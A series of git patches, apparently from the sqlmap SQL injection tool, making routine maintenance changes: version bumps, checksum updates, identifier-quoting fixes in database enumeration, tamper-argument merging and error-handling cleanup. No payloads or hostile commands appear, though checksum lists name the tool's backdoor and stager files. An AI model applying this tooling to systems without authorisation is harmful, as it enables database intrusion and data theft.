-de9fa04f019f5d14db8589e1a61b3064 lib/core/settings.py +279a9ae0ba5b11e48fa3e3c7fc0f6173 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -248bd121e0565318e1efaff54aa427bc lib/core/target.py +62bc180e3e828949ffb342a8f756c183 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py e896992e4db26605ab1e73615b1f9434 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -112,7 +112,7 @@ f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py -b0105f091c2e919c3cdb549cb29fd194 lib/utils/pivotdumptable.py +527409077a094b63c88f3291138b1c81 lib/utils/pivotdumptable.py 683c3bd05b6164f56a57ed495c162684 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py @@ -157,7 +157,7 @@ aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py 6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py -f33efaab1695dc9885ebae3f6072fffa plugins/dbms/maxdb/enumeration.py +c5728157a49a4a3a98d414f453bb347e plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py @@ -199,7 +199,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py -426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py +6a675a1eb50121a3290e77f0e83a78b3 plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py 0329ab09187614bea02398def59695ec plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py @@ -217,7 +217,7 @@ f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py -4419b13a4b78d7e9e4a2632302344a1a plugins/generic/users.py +4db140069923afbae38fd93e37c00248 plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ From 4b698748f7c405d75708effd4c1e89b85c911774 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 21 Sep 2018 23:25:25 +0200 Subject: [PATCH 296/428] Fixes #3247 --- lib/core/settings.py | 2 +- plugins/dbms/maxdb/enumeration.py | 2 +- plugins/dbms/sybase/enumeration.py | 6 +++--- plugins/generic/entries.py | 5 +---- txt/checksum.md5 | 8 ++++---- 5 files changed, 10 insertions(+), 13 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5b589fd7e76..5ff59fd4552 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.35" +VERSION = "1.2.9.36" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index 16f3e1068b7..da2a502c115 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -191,7 +191,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod if dumpMode and colList: table = {} - table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) + table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList) kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table continue diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index a1febb716ee..f7d5b0970b7 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -207,7 +207,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod raise SqlmapNoneDataException(errMsg) for tbl in tblList: - tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl) + tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) if bruteForce: resumeAvailable = False @@ -265,7 +265,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod if dumpMode and colList: table = {} - table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) + table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList) kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table continue @@ -285,7 +285,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.usertype" % kb.aliasName])): columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_) - table[safeSQLIdentificatorNaming(tbl)] = columns + table[safeSQLIdentificatorNaming(tbl, True)] = columns kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table break diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index abf2003bbb5..80230ce0f9c 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -129,10 +129,7 @@ def dumpTable(self, foundData=None): else: kb.dumpTable = "%s.%s" % (conf.db, tbl) - if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ - or safeSQLIdentificatorNaming(tbl, True) not in \ - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \ - or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: + if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: warnMsg = "unable to enumerate the columns for table " warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl) warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index ac59b80db0e..1b7e6ac5319 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -279a9ae0ba5b11e48fa3e3c7fc0f6173 lib/core/settings.py +fe3d03cf236257200f3d373babfe54d5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -157,7 +157,7 @@ aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py 6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py -c5728157a49a4a3a98d414f453bb347e plugins/dbms/maxdb/enumeration.py +53d1bf931baa6b76198ece861e2318a3 plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py @@ -199,7 +199,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py -6a675a1eb50121a3290e77f0e83a78b3 plugins/dbms/sybase/enumeration.py +b856f677371a59d4a01b72bacac88032 plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py 0329ab09187614bea02398def59695ec plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py @@ -208,7 +208,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py 2e0c1c5ced14222d9fef2dd12447d815 plugins/generic/databases.py -4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py +ea3a7f87e3e0cbc3aacbd3af4b6f5ce6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py From 459e1dd9a415ce9e1b0bba07ff1bdf4628e06b62 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 24 Sep 2018 10:26:27 +0200 Subject: [PATCH 297/428] Update related to the #3252 --- lib/controller/checks.py | 5 ----- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 8 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index e8d8b0f527a..211ae5c8f71 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -992,11 +992,6 @@ def checkFilteredChars(injection): kb.injection = popValue() def heuristicCheckSqlInjection(place, parameter): - if kb.nullConnection: - debugMsg = "heuristic check skipped because NULL connection used" - logger.debug(debugMsg) - return None - if kb.heavilyDynamic: debugMsg = "heuristic check skipped because of heavy dynamicity" logger.debug(debugMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5ff59fd4552..d442b0957eb 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.36" +VERSION = "1.2.9.37" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1b7e6ac5319..3ee4c81936d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -ba0f924d43ff1e41f070afb003ed0aaa lib/controller/checks.py +61b66a7c30eb43c6b99ad57e4a8b5b22 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fe3d03cf236257200f3d373babfe54d5 lib/core/settings.py +d19e57fe2d2830703117b44a57f5922a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From f4a0820dcb5fded8bc4d0363c91276eb9a3445ae Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 24 Sep 2018 14:00:58 +0200 Subject: [PATCH 298/428] Merging of tamper script arguments (e.g. --tamper A --tamper B -> --tamper=A,B) --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 7 +++++++ txt/checksum.md5 | 4 ++-- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d442b0957eb..1b01c8efc1e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.37" +VERSION = "1.2.9.38" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index b6a46c0b3d4..86faefd9b56 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -753,6 +753,7 @@ def _(self, *args): prompt = False advancedHelp = True extraHeaders = [] + tamperIndex = None # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") for arg in argv: @@ -824,6 +825,12 @@ def _(self, *args): elif re.search(r"\A-\w=.+", argv[i]): dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i]) raise SystemExit + elif argv[i].startswith("--tamper"): + if tamperIndex is None: + tamperIndex = i if '=' in argv[i] else (i + 1 if i + 1 < len(argv) and not argv[i + 1].startswith('-') else None) + else: + argv[tamperIndex] = "%s,%s" % (argv[tamperIndex], argv[i].split('=')[1] if '=' in argv[i] else (argv[i + 1] if i + 1 < len(argv) and not argv[i + 1].startswith('-') else "")) + argv[i] = "" elif argv[i] == "-H": if i + 1 < len(argv): extraHeaders.append(argv[i + 1]) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3ee4c81936d..e204e090f85 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d19e57fe2d2830703117b44a57f5922a lib/core/settings.py +9f3052dd8ab94a3429f356d40dc263c1 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -61,7 +61,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -134bbbf67bb30c188b8409c0b3bfbc2a lib/parse/cmdline.py +4296aee13e84a7394f2329dc7ea542ef lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From 68a83098abfb25b8c4d7e975643b01f693cc11c9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 25 Sep 2018 14:06:32 +0200 Subject: [PATCH 299/428] Update of THANKS (based on 2017 donation) --- doc/THANKS.md | 1 + lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/doc/THANKS.md b/doc/THANKS.md index 6e9f85819ef..94a32b480d0 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -597,6 +597,7 @@ Carlos Gabriel Vergara, Patrick Webster, * for suggesting an enhancement +* for donating to sqlmap development (from OSI.Security) Ed Williams, * for suggesting a minor enhancement diff --git a/lib/core/settings.py b/lib/core/settings.py index 1b01c8efc1e..16385595266 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.38" +VERSION = "1.2.9.39" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e204e090f85..4480216f9a3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9f3052dd8ab94a3429f356d40dc263c1 lib/core/settings.py +bae340b4a0f79271c0690deff7d849a1 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 3b369920a1c43cac583e51683960a72f148b22f2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 26 Sep 2018 15:33:34 +0200 Subject: [PATCH 300/428] Minor patch related to the #3257 --- lib/core/settings.py | 2 +- lib/core/threads.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 16385595266..a855f3eb074 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.39" +VERSION = "1.2.9.40" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/threads.py b/lib/core/threads.py index a0bf58e3738..c6588dd1101 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -95,7 +95,7 @@ def exceptionHandledFunction(threadFunction, silent=False): if not silent: logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) - if conf.verbose > 1: + if conf.get("verbose") > 1: traceback.print_exc() def setDaemon(thread): @@ -189,7 +189,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio kb.threadException = True logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) - if conf.verbose > 1: + if conf.get("verbose") > 1: traceback.print_exc() except: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4480216f9a3..5ee23611fae 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,12 +50,12 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bae340b4a0f79271c0690deff7d849a1 lib/core/settings.py +495854418b62c5ad47ae1eb0ac891976 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py -e896992e4db26605ab1e73615b1f9434 lib/core/threads.py +29efb66f3c444c09d29925cf552851cd lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py From 71208e891c856552ac1b6abfd01189fb35a771b7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 27 Sep 2018 09:15:53 +0200 Subject: [PATCH 301/428] Update regarding #3258 --- lib/core/settings.py | 2 +- lib/utils/versioncheck.py | 3 +- sqlmap.py | 64 +++++++++++++++++++++------------------ txt/checksum.md5 | 6 ++-- 4 files changed, 40 insertions(+), 35 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index a855f3eb074..355459dd108 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.40" +VERSION = "1.2.9.41" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index f57ea0682e8..c78b6954506 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py @@ -6,11 +6,12 @@ """ import sys +import time PYVERSION = sys.version.split()[0] if PYVERSION >= "3" or PYVERSION < "2.6": - exit("[CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION) + exit("[%s] [CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % (time.strftime("%X"), PYVERSION)) errors = [] extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib") diff --git a/sqlmap.py b/sqlmap.py index f64e5e9ff84..31410a11fd8 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -5,37 +5,37 @@ See the file 'LICENSE' for copying permission """ -import sys +try: + import sys -sys.dont_write_bytecode = True + sys.dont_write_bytecode = True -try: - __import__("lib.utils.versioncheck") # this has to be the first non-standard import -except ImportError: - exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details") - -import bdb -import distutils -import glob -import inspect -import json -import logging -import os -import re -import shutil -import sys -import thread -import threading -import time -import traceback -import warnings - -warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) -warnings.filterwarnings(action="ignore", category=DeprecationWarning) - -from lib.core.data import logger + try: + __import__("lib.utils.versioncheck") # this has to be the first non-standard import + except ImportError: + exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details") + + import bdb + import distutils + import glob + import inspect + import json + import logging + import os + import re + import shutil + import sys + import thread + import threading + import time + import traceback + import warnings + + warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) + warnings.filterwarnings(action="ignore", category=DeprecationWarning) + + from lib.core.data import logger -try: from lib.core.common import banner from lib.core.common import checkIntegrity from lib.core.common import createGithubIssue @@ -67,9 +67,13 @@ from lib.parse.cmdline import cmdLineParser except KeyboardInterrupt: errMsg = "user aborted" - logger.error(errMsg) - raise SystemExit + if "logger" in globals(): + logger.error(errMsg) + raise SystemExit + else: + import time + exit("\r[%s] [ERROR] %s" % (time.strftime("%X"), errMsg)) def modulePath(): """ diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5ee23611fae..6abbdd545a5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -495854418b62c5ad47ae1eb0ac891976 lib/core/settings.py +59274b9acea517616aed86e58808e02d lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -118,7 +118,7 @@ d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py 571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py -faa7536c4788ee118b19338f3e98e556 lib/utils/versioncheck.py +4703ceeb32131a9a7a6561575644123b lib/utils/versioncheck.py e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py @@ -228,7 +228,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -a35b5b83c12841fdf3925190c9d24299 sqlmap.py +5f30815ebe320e46e5898dc819e629a7 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From 932aa8dd94ce5e2f8cd473ac0f32f34d915e22d8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 28 Sep 2018 13:12:21 +0200 Subject: [PATCH 302/428] Fixes #3262 --- lib/core/bigarray.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index f12d23148dd..b99c6f98074 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -126,7 +126,7 @@ def _checkcache(self, index): try: with open(self.chunks[index], "rb") as f: self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False) - except IOError, ex: + except Exception, ex: errMsg = "exception occurred while retrieving data " errMsg += "from a temporary file ('%s')" % ex.message raise SqlmapSystemException(errMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index 355459dd108..c87a02653a5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.41" +VERSION = "1.2.9.42" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6abbdd545a5..cb5a6e1a088 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py -fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py +c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py cbf9428039f52d8ee80fcf79b6583b7c lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -59274b9acea517616aed86e58808e02d lib/core/settings.py +987652d171b26820be98f557354bb5cf lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 